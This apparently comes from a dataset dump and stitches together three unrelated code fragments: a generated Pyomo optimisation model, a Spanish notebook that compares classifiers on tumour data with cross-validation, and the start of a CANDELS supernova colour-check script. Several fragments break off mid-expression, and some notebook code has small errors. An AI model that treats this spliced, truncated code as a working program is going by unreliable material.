input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
0)
m.e3273 = Constraint(expr= m.x2013 + 3.5 * m.b2353 <= 3.5)
m.e3274 = Constraint(expr= m.x2014 + 3.5 * m.b2354 <= 3.5)
m.e3275 = Constraint(expr= m.x2015 + 3.5 * m.b2355 <= 3.5)
m.e3276 = Constraint(expr= m.x2016 + 3.5 * m.b2356 <= 3.5)
m.e3277 = Constraint(expr= m.x2073 - 3.15 * m.b2353 <= 0)
m.e3278 = Constraint(expr= m.x2074 - 3.15 * m.b2354 <= 0)
m.e3279 = Constraint(expr= m.x2075 - 3.15 * m.b2355 <= 0)
m.e3280 = Constraint(expr= m.x2076 - 3.15 * m.b2356 <= 0)
m.e3281 = Constraint(expr= m.x2077 + 3.15 * m.b2353 <= 3.15)
m.e3282 = Constraint(expr= m.x2078 + 3.15 * m.b2354 <= 3.15)
m.e3283 = Constraint(expr= m.x2079 + 3.15 * m.b2355 <= 3.15)
m.e3284 = Constraint(expr= m.x2080 + 3.15 * m.b2356 <= 3.15)
m.e3285 = Constraint(expr= -0.6 * m.x2017 + m.x2081 == 0)
m.e3286 = Constraint(expr= -0.6 * m.x2018 + m.x2082 == 0)
m.e3287 = Constraint(expr= -0.6 * m.x2019 + m.x2083 == 0)
m.e3288 = Constraint(expr= -0.6 * m.x2020 + m.x2084 == 0)
m.e3289 = Constraint(expr= m.x2021 == 0)
m.e3290 = Constraint(expr= m.x2022 == 0)
m.e3291 = Constraint(expr= m.x2023 == 0)
m.e3292 = Constraint(expr= m.x2024 == 0)
m.e3293 = Constraint(expr= m.x2085 == 0)
m.e3294 = Constraint(expr= m.x2086 == 0)
m.e3295 = Constraint(expr= m.x2087 == 0)
m.e3296 = Constraint(expr= m.x2088 == 0)
m.e3297 = Constraint(expr= m.x1445 - m.x2017 - m.x2021 == 0)
m.e3298 = Constraint(expr= m.x1446 - m.x2018 - m.x2022 == 0)
m.e3299 = Constraint(expr= m.x1447 - m.x2019 - m.x2023 == 0)
m.e3300 = Constraint(expr= m.x1448 - m.x2020 - m.x2024 == 0)
m.e3301 = Constraint(expr= m.x1469 - m.x2081 - m.x2085 == 0)
m.e3302 = Constraint(expr= m.x1470 - m.x2082 - m.x2086 == 0)
m.e3303 = Constraint(expr= m.x1471 - m.x2083 - m.x2087 == 0)
m.e3304 = Constraint(expr= m.x1472 - m.x2084 - m.x2088 == 0)
m.e3305 = Constraint(expr= m.x2017 - 3.5 * m.b2357 <= 0)
m.e3306 = Constraint(expr= m.x2018 - 3.5 * m.b2358 <= 0)
m.e3307 = Constraint(expr= m.x2019 - 3.5 * m.b2359 <= 0)
m.e3308 = Constraint(expr= m.x2020 - 3.5 * m.b2360 <= 0)
m.e3309 = Constraint(expr= m.x2021 + 3.5 * m.b2357 <= 3.5)
m.e3310 = Constraint(expr= m.x2022 + 3.5 * m.b2358 <= 3.5)
m.e3311 = Constraint(expr= m.x2023 + 3.5 * m.b2359 <= 3.5)
m.e3312 = Constraint(expr= m.x2024 + 3.5 * m.b2360 <= 3.5)
m.e3313 = Constraint(expr= m.x2081 - 2.1 * m.b2357 <= 0)
m.e3314 = Constraint(expr= m.x2082 - 2.1 * m.b2358 <= 0)
m.e3315 = Constraint(expr= m.x2083 - 2.1 * m.b2359 <= 0)
m.e3316 = Constraint(expr= m.x2084 - 2.1 * m.b2360 <= 0)
m.e3317 = Constraint(expr= m.x2085 + 2.1 * m.b2357 <= 2.1)
m.e3318 = Constraint(expr= m.x2086 + 2.1 * m.b2358 <= 2.1)
m.e3319 = Constraint(expr= m.x2087 + 2.1 * m.b2359 <= 2.1)
m.e3320 = Constraint(expr= m.x2088 + 2.1 * m.b2360 <= 2.1)
m.e3321 = Constraint(expr= (m.x2089 / (0.001 + 0.999 * m.b2361) - 1.1 * log(
m.x2025 / (0.001 + 0.999 * m.b2361) + 1)) * (0.001 + 0.999 * m.b2361) <= 0)
m.e3322 = Constraint(expr= (m.x2090 / (0.001 + 0.999 * m.b2362) - 1.1 * log(
m.x2026 / (0.001 + 0.999 * m.b2362) + 1)) * (0.001 + 0.999 * m.b2362) <= 0)
m.e3323 = Constraint(expr= (m.x2091 / (0.001 + 0.999 * m.b2363) - 1.1 * log(
m.x2027 / (0.001 + 0.999 * m.b2363) + 1)) * (0.001 + 0.999 * m.b2363) <= 0)
m.e3324 = Constraint(expr= (m.x2092 / (0.001 + 0.999 * m.b2364) - 1.1 * log(
m.x2028 / (0.001 + 0.999 * m.b2364) + 1)) * (0.001 + 0.999 * m.b2364) <= 0)
m.e3325 = Constraint(expr= m.x2029 == 0)
m.e3326 = Constraint(expr= m.x2030 == 0)
m.e3327 = Constraint(expr= m.x2031 == 0)
m.e3328 = Constraint(expr= m.x2032 == 0)
m.e3329 = Constraint(expr= m.x2093 == 0)
m.e3330 = Constraint(expr= m.x2094 == 0)
m.e3331 = Constraint(expr= m.x2095 == 0)
m.e3332 = Constraint(expr= m.x2096 == 0)
m.e3333 = Constraint(expr= m.x1449 - m.x2025 - m.x2029 == 0)
m.e3334 = Constraint(expr= m.x1450 - m.x2026 - m.x2030 == 0)
m.e3335 = Constraint(expr= m.x1451 - m.x2027 - m.x2031 == 0)
m.e3336 = Constraint(expr= m.x1452 - m.x2028 - m.x2032 == 0)
m.e3337 = Constraint(expr= m.x1473 - m.x2089 - m.x2093 == 0)
m.e3338 = Constraint(expr= m.x1474 - m.x2090 - m.x2094 == 0)
m.e3339 = Constraint(expr= m.x1475 - m.x2091 - m.x2095 == 0)
m.e3340 = Constraint(expr= m.x1476 - m.x2092 - m.x2096 == 0)
m.e3341 = Constraint(expr= m.x2025 - 3.5 * m.b2361 <= 0)
m.e3342 = Constraint(expr= m.x2026 - 3.5 * m.b2362 <= 0)
m.e3343 = Constraint(expr= m.x2027 - 3.5 * m.b2363 <= 0)
m.e3344 = Constraint(expr= m.x2028 - 3.5 * m.b2364 <= 0)
m.e3345 = Constraint(expr= m.x2029 + 3.5 * m.b2361 <= 3.5)
m.e3346 = Constraint(expr= m.x2030 + 3.5 * m.b2362 <= 3.5)
m.e3347 = Constraint(expr= m.x2031 + 3.5 * m.b2363 <= 3.5)
m.e3348 = Constraint(expr= m.x2032 + 3.5 * m.b2364 <= 3.5)
m.e3349 = Constraint(expr= m.x2089 - 1.6544851364539 * m.b2361 <= 0)
m.e3350 = Constraint(expr= m.x2090 - 1.6544851364539 * m.b2362 <= 0)
m.e3351 = Constraint(expr= m.x2091 - 1.6544851364539 * m.b2363 <= 0)
m.e3352 = Constraint(expr= m.x2092 - 1.6544851364539 * m.b2364 <= 0)
m.e3353 = Constraint(expr= m.x2093 + 1.6544851364539 * m.b2361
<= 1.6544851364539)
m.e3354 = Constraint(expr= m.x2094 + 1.6544851364539 * m.b2362
<= 1.6544851364539)
m.e3355 = Constraint(expr= m.x2095 + 1.6544851364539 * m.b2363
<= 1.6544851364539)
m.e3356 = Constraint(expr= m.x2096 + 1.6544851364539 * m.b2364
<= 1.6544851364539)
m.e3357 = Constraint(expr= -0.9 * m.x2037 + m.x2169 == 0)
m.e3358 = Constraint(expr= -0.9 * m.x2038 + m.x2170 == 0)
m.e3359 = Constraint(expr= -0.9 * m.x2039 + m.x2171 == 0)
m.e3360 = Constraint(expr= -0.9 * m.x2040 + m.x2172 == 0)
m.e3361 = Constraint(expr= -m.x2113 + m.x2169 == 0)
m.e3362 = Constraint(expr= -m.x2114 + m.x2170 == 0)
m.e3363 = Constraint(expr= -m.x2115 + m.x2171 == 0)
m.e3364 = Constraint(expr= -m.x2116 + m.x2172 == 0)
m.e3365 = Constraint(expr= m.x2045 == 0)
m.e3366 = Constraint(expr= m.x2046 == 0)
m.e3367 = Constraint(expr= m.x2047 == 0)
m.e3368 = Constraint(expr= m.x2048 == 0)
m.e3369 = Constraint(expr= m.x2117 == 0)
m.e3370 = Constraint(expr= m.x2118 == 0)
m.e3371 = Constraint(expr= m.x2119 == 0)
m.e3372 = Constraint(expr= m.x2120 == 0)
m.e3373 = Constraint(expr= m.x2173 == 0)
m.e3374 = Constraint(expr= m.x2174 == 0)
m.e3375 = Constraint(expr= m.x2175 == 0)
m.e3376 = Constraint(expr= m.x2176 == 0)
m.e3377 = Constraint(expr= m.x1453 - m.x2037 - m.x2045 == 0)
m.e3378 = Constraint(expr= m.x1454 - m.x2038 - m.x2046 == 0)
m.e3379 = Constraint(expr= m.x1455 - m.x2039 - m.x2047 == 0)
m.e3380 = Constraint(expr= m.x1456 - m.x2040 - m.x2048 == 0)
m.e3381 = Constraint(expr= m.x1485 - m.x2113 - m.x2117 == 0)
m.e3382 = Constraint(expr= m.x1486 - m.x2114 - m.x2118 == 0)
m.e3383 = Constraint(expr= m.x1487 - m.x2115 - m.x2119 == 0)
m.e3384 = Constraint(expr= m.x1488 - m.x2116 - m.x2120 == 0)
m.e3385 = Constraint(expr= m.x1517 - m.x2169 - m.x2173 == 0)
m.e3386 = Constraint(expr= m.x1518 - m.x2170 - m.x2174 == 0)
m.e3387 = Constraint(expr= m.x1519 - m.x2171 - m.x2175 == 0)
m.e3388 = Constraint(expr= m.x1520 - m.x2172 - m.x2176 == 0)
m.e3389 = Constraint(expr= m.x2037 - 0.542802524296876 * m.b2365 <= 0)
m.e3390 = Constraint(expr= m.x2038 - 0.542802524296876 * m.b2366 <= 0)
m.e3391 = Constraint(expr= m.x2039 - 0.542802524296876 * m.b2367 <= 0)
m.e3392 = Constraint(expr= m.x2040 - 0.542802524296876 * m.b2368 <= 0)
m.e3393 = Constraint(expr= m.x2045 + 0.542802524296876 * m.b2365
<= 0.542802524296876)
m.e3394 = Constraint(expr= m.x2046 + 0.542802524296876 * m.b2366
<= 0.542802524296876)
m.e3395 = Constraint(expr= m.x2047 + 0.542802524296876 * m.b2367
<= 0.542802524296876)
m.e3396 = Constraint(expr= m.x2048 + 0.542802524296876 * m.b2368
<= 0.542802524296876)
m.e3397 = Constraint(expr= m.x2113 - 7 * m.b2365 <= 0)
m.e3398 = Constraint(expr= m.x2114 - 7 * m.b2366 <= 0)
m.e3399 = Constraint(expr= m.x2115 - 7 * m.b2367 <= 0)
m.e3400 = Constraint(expr= m.x2116 - 7 * m.b2368 <= 0)
m.e3401 = Constraint(expr= m.x2117 + 7 * m.b2365 <= 7)
m.e3402 = Constraint(expr= m.x2118 + 7 * m.b2366 <= 7)
m.e3403 = Constraint(expr= m.x2119 + 7 * m.b2367 <= 7)
m.e3404 = Constraint(expr= m.x2120 + 7 * m.b2368 <= 7)
m.e3405 = Constraint(expr= m.x2169 - 7 * m.b2365 <= 0)
m.e3406 = Constraint(expr= m.x2170 - 7 * m.b2366 <= 0)
m.e3407 = Constraint(expr= m.x2171 - 7 * m.b2367 <= 0)
m.e3408 = Constraint(expr= m.x2172 - 7 * m.b2368 <= 0)
m.e3409 = Constraint(expr= m.x2173 + 7 * m.b2365 <= 7)
m.e3410 = Constraint(expr= m.x2174 + 7 * m.b2366 <= 7)
m.e3411 = Constraint(expr= m.x2175 + 7 * m.b2367 <= 7)
m.e3412 = Constraint(expr= m.x2176 + 7 * m.b2368 <= 7)
m.e3413 = Constraint(expr= (m.x2177 / (0.001 + 0.999 * m.b2369) - log(m.x2053
/ (0.001 + 0.999 * m.b2369) + 1)) * (0.001 + 0.999 * m.b2369) <= 0)
m.e3414 = Constraint(expr= (m.x2178 / (0.001 + 0.999 * m.b2370) - log(m.x2054
/ (0.001 + 0.999 * m.b2370) + 1)) * (0.001 + 0.999 * m.b2370) <= 0)
m.e3415 = | |
res_knn_brute]
barras = ('Auto','Ball Tree','Kd tree','Brute')
y_pos = np.arange(len(barras))
plt.bar(y_pos, alto, color=['pink', 'yellow', 'purple', 'cyan'])
plt.xticks(y_pos, barras)
plt.show()
# #### Analisis
#
# * No se puede determinar cual algoritmo es mejor, porque cuando se utilizan estos algortimos y se ha corrido el primero, es muy usual que los siguientes den exactamente igual (esto es muy usual en KNN), asi que no se puede tener claridad en cual escoger.
# #### 2. ¿Cual algoritmo usaria con base en la informacion obtenida en los dos ejercicios anteriores?
# #### Analisis:
#
# * Como en KNN es usual que una vez habiendo corrido el modelo y despues cambiando los algoritmos estos den igual, yo usuaria cualquiera (para este caso espeficio) pero si de verdad se quiere ver cual seria mejor se tendria que trabajar cada uno por aislado para ver con cual se obtiene un mejor poder predictivo.
# ## Pregunta 4:
# #### Para esta pregunta tambien usaremos los datos tumores.csv
# #### 1. El objetivo de este ejercicio es comparar todos los metodos predictivos vistos en el curso con esta tabla de datos. Aqui interesa predecir en la variable tipo. Para esto genere Validaciones Cruzadas con 5 grupos para los metodos SVM, KNN, Arboles, Bosques, ADA Boosting, eXtreme Gradient Boosting, Bayes, LDA, QDA y Redes Neuronales del paquete MLPClassifier. Para KNN y Bosques use los parametros obtenidos en las calibraciones realizadas en los ejercicios anteriores (en teoria se deberian calibrar todos los metodos). Luego realice un grafico de barras para comparar los metodos. ¿Se puede determinar con claridad cual metodos es el mejor? Utilice KFold de sklearn?
# #### Metodo Arboles con criterio "Gini"
# In[63]:
from sklearn.tree import DecisionTreeClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(DecisionTreeClassifier(criterion = 'gini'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_arbol_gini = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Metodos Arbole con criterio "Entropy"
# In[64]:
from sklearn.tree import DecisionTreeClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(DecisionTreeClassifier(criterion = 'entropy'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_arbol_entropy = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Potenciación (ADA Boosting) Algoritmo "SAMME-R"
# In[65]:
from sklearn.ensemble import AdaBoostClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(AdaBoostClassifier(algorithm = "SAMME.R", n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_potenciacion_sammer = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Potenciación (ADA Boosting) Algoritmo "SAMME"
# In[66]:
from sklearn.ensemble import AdaBoostClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(AdaBoostClassifier(algorithm = "SAMME", n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_potenciacion_samme = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Potenciación Extrema (XGBoosting) criterio "friedman_mse"
# In[70]:
from sklearn.ensemble import GradientBoostingClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GradientBoostingClassifier(criterion = 'friedman_mse', n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_xg_potenciacion_friedman = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Potenciación Extrema (XGBoosting) criterio "mse"
# In[71]:
from sklearn.ensemble import GradientBoostingClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GradientBoostingClassifier(criterion = 'mse', n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_xg_potenciacion_mse = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Potenciación Extrema (XGBoosting) criterio "mae"
# In[73]:
from sklearn.ensemble import GradientBoostingClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GradientBoostingClassifier(criterion = 'mae', n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_xg_potenciacion_mae = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Maquinas de Soporte Vectorial, kernel "Sigmoid"
# In[74]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='sigmoid', gamma = 'scale'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_sigmoid= porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Maquinas de Soporte Vectorial, kernel "rbf"
# In[75]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='rbf', gamma = 'scale'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_rbf= porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Maquinas de Soporte Vectorial, kernel "Poly"
# In[77]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='poly', gamma = 'scale'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_poly = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Maquinas de Soporte Vectorial, kernel "Linear" (se usa max_iter=250000 para que no dure mucho).
# In[79]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='linear', gamma = 'scale',max_iter=250000), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_linear = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Redes Neuronales - MLPClassifier, Activation = "Identity"
# In[80]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'identity', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_iden = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Redes Neuronales - MLPClassifier, Activation = "Logistic"
# In[81]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'logistic', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_logis = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Redes Neuronales - MLPClassifier, Activation = "Tahn"
# In[82]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'tanh', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_tahn = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Redes Neuronales - MLPClassifier, Activation = "relu"
# In[83]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'relu', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_relu = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Método Ingenuo de Bayes
# In[84]:
from sklearn.naive_bayes import GaussianNB
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GaussianNB(), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_bayes = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Análisis Discriminte Lineal solver = "Eigen"
# In[91]:
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(LinearDiscriminantAnalysis(solver = 'eigen', shrinkage = 'auto'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_dis_lineal_eigen = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Análisis Discriminte Lineal solver = "lsqr"
# In[92]:
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(LinearDiscriminantAnalysis(solver = 'lsqr', shrinkage = 'auto'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_dis_lineal_lsqr = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Análisis Discriminte Cuadrático
# In[97]:
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(QuadraticDiscriminantAnalysis(), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_dis_cuadratico = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Gráfico Comparativo
# In[137]:
plt.figure(figsize=(38,20))
alto = [res_bosques_gini, res_bosques_entropy , res_knn_auto, res_knn_ball , res_knn_kd, res_knn_brute, res_arbol_gini , res_arbol_entropy, res_potenciacion_sammer , res_potenciacion_samme, res_xg_potenciacion_friedman, res_xg_potenciacion_mse, res_xg_potenciacion_mae, res_svm_sigmoid, res_svm_rbf, res_svm_poly, res_svm_linear, res_redes_MLP_iden , res_redes_MLP_logis, res_redes_MLP_tahn, res_redes_MLP_relu, res_bayes, res_dis_lineal_eigen, res_dis_lineal_lsqr, res_dis_cuadratico]
barras = ('RF Gini', 'RF Entro', 'KNN auto', 'KNN ball', 'KNN kd', 'KNN brute', 'Arbol Gini', 'Arbol Entro', 'ADA Samme R', 'ADA Samme', 'XG Friedman', 'XG mse' , 'XG Mae', 'SVM Sigmo', 'SVM RBF', 'SVM Poly', 'SVM linear', 'Redes Iden','Redes Logis', 'Redes Tanh', 'Redes Relu', 'Bayes', 'Dis Lin Eigen', 'Dis Lin lsqr', 'Dis cuadra')
y_pos = np.arange(len(barras))
plt.bar(y_pos, alto,color = ["#67E568","#257F27","#08420D","#FFF000","#FFB62B","#E56124","#E53E30","#7F2353","#F911FF","#9F8CA6",'aqua', 'navy', 'plum', 'pink', 'skyblue', 'purple', 'indigo', 'blueviolet', 'crimson', 'coral', 'peru', 'cadetblue', 'gold', 'darkseagreen', 'greenyellow']
)
plt.xticks(y_pos, barras)
plt.show()
# #### Analisis
#
# * Haciendo la calibracion con todos los metodos vistos en el curso, se puede ver que los que generan mejores resultados son:
# * Random Forest con criterio Gini y Entropia.
# * Redes Neuronales usando la activacion por identity.
# * Analisis Discriminante Cuadratico.
# * Y finalmente Bayes.
# #### 2. ¿Se podra incluir en esta seleccion las Redes Neuronales del paquete Keras? Si la respuesta es que si entonces incluyalo.
# In[140]:
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
# funcion para crear el modelo, requerido por KerasClassifier
def create_model():
# crea el modelo
model = Sequential()
model.add(Dense(12, input_dim=17, activation='relu'))
model.add(Dense(8, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
# Compila el modelo
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
# Fija las semillas aleatorias para la reproducibilidad
seed = 7
numpy.random.seed(seed)
# carga los datos
dataset = pd.read_csv("tumores.csv", delimiter = ',', decimal = '.')
# Convierte las variables de object a categórica
dataset['imagen'] = dataset['imagen'].astype('category')
# Recodifica las categorías usando números
dataset["imagen"] = dataset["imagen"].cat.codes
# Convierte las variables de entero a categórica
dataset['imagen'] = dataset['imagen'].astype('category')
# split para la variables predictoras (X) y a predecir (y)
X = dataset.iloc[:,0:17]
Y = dataset.iloc[:,17:18]
# crea el modelo
model = KerasClassifier(build_fn=create_model, epochs=150, batch_size=10, verbose=0)
# evalua usando 5 - fold validacion cruzada
kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=seed)
results = cross_val_score(model, X, Y, cv=kfold)
print(results.mean())
# Asignando variable para grafico
res_keras = results.mean()
# #### Grafico Comparativo incluyendo Validacion Cruzada con Keras
# In[141]:
plt.figure(figsize=(38,20))
alto = [res_bosques_gini, res_bosques_entropy , res_knn_auto, res_knn_ball , res_knn_kd, res_knn_brute, res_arbol_gini , res_arbol_entropy, res_potenciacion_sammer , res_potenciacion_samme, res_xg_potenciacion_friedman, res_xg_potenciacion_mse, res_xg_potenciacion_mae, res_svm_sigmoid, res_svm_rbf, res_svm_poly, res_svm_linear, res_redes_MLP_iden , res_redes_MLP_logis, res_redes_MLP_tahn, res_redes_MLP_relu, res_bayes, res_dis_lineal_eigen, res_dis_lineal_lsqr, res_dis_cuadratico, res_keras]
barras = ('RF Gini', 'RF Entro', 'KNN auto', 'KNN ball', 'KNN kd', 'KNN brute', 'Arbol Gini', 'Arbol Entro', 'ADA Samme R', 'ADA Samme', 'XG Friedman', 'XG mse' , 'XG Mae', 'SVM Sigmo', 'SVM RBF', 'SVM Poly', 'SVM linear', 'Redes Iden','Redes Logis', 'Redes Tanh', 'Redes Relu', 'Bayes', 'Dis Lin Eigen', 'Dis Lin lsqr', 'Dis cuadra', 'Redes keras')
y_pos = np.arange(len(barras))
plt.bar(y_pos, alto,color = ["#67E568","#257F27","#08420D","#FFF000","#FFB62B","#E56124","#E53E30","#7F2353","#F911FF","#9F8CA6",'aqua', 'navy', 'plum', 'pink', 'skyblue', 'purple', 'indigo', 'blueviolet', 'crimson', 'coral', 'peru', 'cadetblue', 'gold', 'darkseagreen', 'greenyellow', 'teal']
)
plt.xticks(y_pos, barras)
plt.show()
# #### 3. ¿Cual metodo usaria con base en la informacion obtenida en los dos ejercicios anteriores?
# #### Analisis
#
# | |
# 2013.04.26
# S.Rodney
# checking if the simulated SN distributions are in line with the observed
# mags and colors for 0.5 < z < 1.0
# TODO: handle upper limits
# TODO : handle missing nicknames
# TODO : adjust default x scaling
import os
import sys
import stardust
import numpy as np
from matplotlib import pyplot as pl
from matplotlib import patches
sndataroot = os.environ['SNDATA_ROOT']
DATFILELIST = [
'HST_CANDELS1_adams.dat',
'HST_CANDELS1_agnew.dat',
'HST_CANDELS1_aidan.dat',
'HST_CANDELS1_benjamin.dat',
'HST_CANDELS1_buchanan.dat',
'HST_CANDELS1_bush.dat',
'HST_CANDELS1_carter.dat',
'HST_CANDELS1_cleveland.dat',
'HST_CANDELS1_clinton.dat',
'HST_CANDELS1_eisenhower.dat',
'HST_CANDELS1_fdr.dat',
'HST_CANDELS1_ford.dat',
'HST_CANDELS1_garfield.dat',
'HST_CANDELS1_grant.dat',
'HST_CANDELS1_harrison.dat',
'HST_CANDELS1_hayes.dat',
'HST_CANDELS1_herbert.dat',
'HST_CANDELS1_hoover.dat',
'HST_CANDELS1_humphrey.dat',
'HST_CANDELS1_jackson.dat',
'HST_CANDELS1_jefferson.dat',
'HST_CANDELS1_johnson.dat',
'HST_CANDELS1_kennedy.dat',
'HST_CANDELS1_lbj.dat',
'HST_CANDELS1_lincoln.dat',
'HST_CANDELS1_madison.dat',
'HST_CANDELS1_mckinley.dat',
'HST_CANDELS1_mikulski.dat',
'HST_CANDELS1_mondale.dat',
'HST_CANDELS1_pierce.dat',
'HST_CANDELS1_polk.dat',
'HST_CANDELS1_primo.dat',
'HST_CANDELS1_quayle.dat',
'HST_CANDELS1_quincy.dat',
'HST_CANDELS1_reagan.dat',
'HST_CANDELS1_rockefeller.dat',
'HST_CANDELS1_roosevelt.dat',
'HST_CANDELS1_taylor.dat',
'HST_CANDELS1_truman.dat',
'HST_CANDELS1_tumbleweed.dat',
'HST_CANDELS1_vanburen.dat',
'HST_CANDELS1_washington.dat',
'HST_CANDELS1_wilson.dat',
'HST_CANDELS1_workman.dat',
]
def colorcheck_midz1():
datfilelist1 = [
'HST_CANDELS1_taylor.dat',
'HST_CANDELS1_pierce.dat',
'HST_CANDELS1_ford.dat',
'HST_CANDELS1_eisenhower.dat',
'HST_CANDELS1_garfield.dat',
]
fig = pl.figure( 1, figsize=(19,12) )
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
pl.clf()
fig = pl.figure( 2, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist1) :
colorCheck( datfile, 5, irow, [1,2] )
def colorcheck_midz2():
datfilelist2 = [
'HST_CANDELS1_workman.dat',
'HST_CANDELS1_roosevelt.dat',
'HST_CANDELS1_jackson.dat',
'HST_CANDELS1_buchanan.dat',
'HST_CANDELS1_reagan.dat',
]
fig = pl.figure( 3, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
fig = pl.figure( 4, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist2) :
colorCheck( datfile, 5, irow, [3,4] )
def colorcheck_midz3():
datfilelist3 = [
'HST_CANDELS1_harrison.dat',
'HST_CANDELS1_fdr.dat',
'HST_CANDELS1_aidan.dat',
